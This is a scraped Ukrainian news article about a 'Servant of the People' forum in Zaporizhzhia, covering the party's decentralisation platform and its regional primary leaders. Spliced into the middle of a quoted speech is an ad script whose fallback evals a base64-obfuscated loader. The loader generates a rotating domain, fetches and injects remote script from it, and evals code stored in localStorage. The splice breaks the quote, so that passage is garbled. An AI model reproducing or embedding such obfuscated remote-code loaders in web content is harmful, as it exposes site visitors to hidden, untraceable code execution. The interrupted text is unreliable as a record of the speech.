На масштабному форумі «Кожен зможе!» у Запоріжжі «Слуга Народу» оголосила лідерів праймеріз

У Запоріжжі 10 вересня відбувся наймасштабніший форум запорізької команди партії «Слуга Народу». Він зібрав сотні людей з усіх куточків Запорізької області.

Команда політичної партії «Слуга Народу» зростає на очах. Численний форум «Кожен зможе!» продемонстрував, що партія «Слуга Народу» — реальна політична сила, яка користується підтримкою великої кількості громадян. Вона відкрита, саме тому її підтримують активні, небайдужі люди, які ладні змінювати Запорізький регіон! Серед них — медики й освітяни, підприємці й айтішники, науковці й аграрії. Основна мета, яка об’єднує цих людей, — зробити країну, нашу область, кожну громаду успішною.

На форумі представили ідеологічні засади, відповідно до яких партія «Слуга Народу» впроваджуватиме в життя свою політику в регіоні.

Так, «Слуга Народу» — команда президента Володимира Зеленського — прихильник центристських засад, що виступає проти радикалізму та крайнощів. Працюючи задля людей, партійці не озираються праворуч чи ліворуч, а йдуть лише вперед, зважаючи лише на те, що всіх об’єднує!

Забезпечення умов для розвитку людини, родини, громади, регіону — основний суспільний меседж ідеологічної платформи партії. Окрім того, представники «Слуги Народу» виступають за чесність та прозорість в політиці, поважаючи специфіку кожного регіону нашої країни, та наполегливо прагнуть миру і єдності в Україні!

До своєї команди «Слуга Народу» залучає чесних, порядних та професіональних людей, які користуються повагою та авторитетом у громаді, які не допустять розкрадання коштів громади хабарниками та крадіями.

ДЕЦЕНТРАЛІЗАЦІЯ І СТРАТЕГІЇ РОЗВИТКУ ГРОМАД

У партії «Слуга Народу» наголошують, що в результаті децентралізації і утворення нових громад відповідальність місцевої влади перед людьми, перед громадою посилюється в рази. Децентралізація означає, що кожен мешканець громади матиме змогу впливати на життя громади. Центральна влада більше не матиме такого суттєвого адміністративного чи фінансового впливу.

Саме тому партія «Слуга Народу» актуалізує Стратегії розвитку громад там, де вони існують, і планує створити нові там, де їх ще немає. Це — єдиний спосіб зробити нашу область, кожну громаду успішною.

Стратегія розвитку громадине просто перелік цифр та меседжів. Це довготривалий план на декілька років, як має розвиватися громада в усіх сферах своєї діяльності. На що спрямовувати зусилля? За рахунок чого громада зможе збільшувати свій бюджет та розбудовувати соціальну сферу? Які галузі розвивати в першу чергу? Що будувати першочергово, а що може почекати? І цей план не залежить від того, хто керівник, яка політична влада в державі і чи змінилися депутати. Основне завдання полягає в тому, щоб зміни в громадах стали системними.

Тому саме робота над Стратегіями розвитку громад стане основою роботи партії «Слуга Народу» у Запорізькій області.

«Нашою командою створений «Зе!План» — це концепція взаємодії мешканців громад та наших майбутніх депутатів, що базується на Стратегіях розвитку. Вони мають стати дорожніми картами громад, відповідно до яких вони будуть рухатись, незважаючи на зміну влади. Стратегії розвитку дозволять діяти сплановано та реалізувати місцевий потенціал. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Крім того, матимемо живі гроші на вирішення болючих питань, які не розв’язувалися роками — школи, дитсадки, лікарні, водогони, благоустрій! Тому одним із наших пріоритетів в роботі Обласної ради нового скликання буде перезавантаження Агенції регіонального розвитку з метою ефективної реалізації місцевих стратегій розвитку та залучення інвестицій в громади. І ми це зробимо!», — наголосив Олександр Свистун, фахівець з питань реформи децентралізації і член команди партії «Слуга Народу» в Запорізькій області.

ЛІДЕРИ ПРАЙМЕРІЗ У ЗАПОРІЗЬКІЙ ОБЛАСТІ

На форумі «Кожен зможе!» також підбили перші підсумки праймеріз нового формату партії «Слуга Народу» в Запорізькій області, які проходили з 31 серпня до 9 вересня. Список лідерів рейтингів праймеріз до Запорізької міської та обласної рад і на посади голів громад оголосили зі сцени.

Десятку тих, хто набрав найбільшу кількість голосів під час внутрішніх рейтингових змагань між претендентами у кандидати на посади депутатів Запорізької обласної ради, представив лідер Запорізької обласної команди партії «Слуга Народу» Віталій Боговін. Ними стали: Звєрєва Катерина, Передерій Олександр, Терехов Роман, Півень Ірина, Пасєвін Віталій, Капустянський Юрій, Дідченко Оксана, Теряєва Олена, Машинський Олександр, Криворучко Наталя.

«Команда «Слуги Народу» в Запорізькій області запустила праймеріз, відкривши можливість кожному долучитися до обрання активних, небайдужих людей, які стануть кандидатами на виборах. Праймеріз дають змогу представляти свої громади у владі людям, що мають нові, ефективні, відкриті підходи до роботи. Це — ефективний механізм повного та відкритого відбору кандидатів, які представлятимуть інтереси мешканців громад», — акцентував Віталій Боговін.

Десятку тих, хто набрав найбільшу кількість голосів під час внутрішніх рейтингових змагань між претендентами на кандидати на посади депутатів Запорізької міської ради, представив лідер Запорізької міської команди партії «Слуга Народу» Віталій Тишечко. Ними стали: Пенчук Інна, Тлеуш Віктор, Борисов Геннадій, Касай Марія, Куртєв Анатолій, Геренко Олексій, Ковпак Владислав, Шалений Євген, Беклеміщев Сергій, Нємченко Маргарита.

«Останнім часом я спілкуюся з дуже великою кількістю людей. Серед них вчителі, лікарі, підприємці та молодь. Їх об’єднує одна риса — палаючі очі. Вони всі прагнуть одного — кардинальних змін. Усі ці люди питають, як нам долучитися до вашої великої команди. Адже ми готові працювати. Саме для цього і було проведено праймеріз, щоб ми могли об’єднати всіх цих людей», — наголосив Віталій Тишечко.

Серед претендентів на посади голів громад найбільшу кількість голосів набрали: Карапетян Юрій, Самарська Тетяна, Долговська Ганна, Гура Віталій, Галіціна Вікторія, Симоненко Юлія, Липка Ірина, Скляров Роман, Котик Олена, Батрак Ігор.

Це — лідери громадської думки, що підтвердили свою особисту підтримку серед мешканців Запорізької області. Переконаний, вони зможуть створити належні умови для того, щоб наша область розвивалася і процвітала. Я зараз дивлюся, яка ж у нас велика і сильна команда! Ми всі разом зможемо змінити життя на краще у нашій рідній Запорізькій області! Час діяти для людей!» — резюмував Віталій Боговін.

Нагадаємо, переможців праймеріз після проходження співбесіди політична партія «Слуга Народу» офіційно висуне кандидатами в депутати або кандидатами на посади голів громад. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/na-masshtabnomu-forumi-kozhen-zmozhe-u-zaporizhzhi-sluga-narodu-ogolosila-lideriv-prajmeriz/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top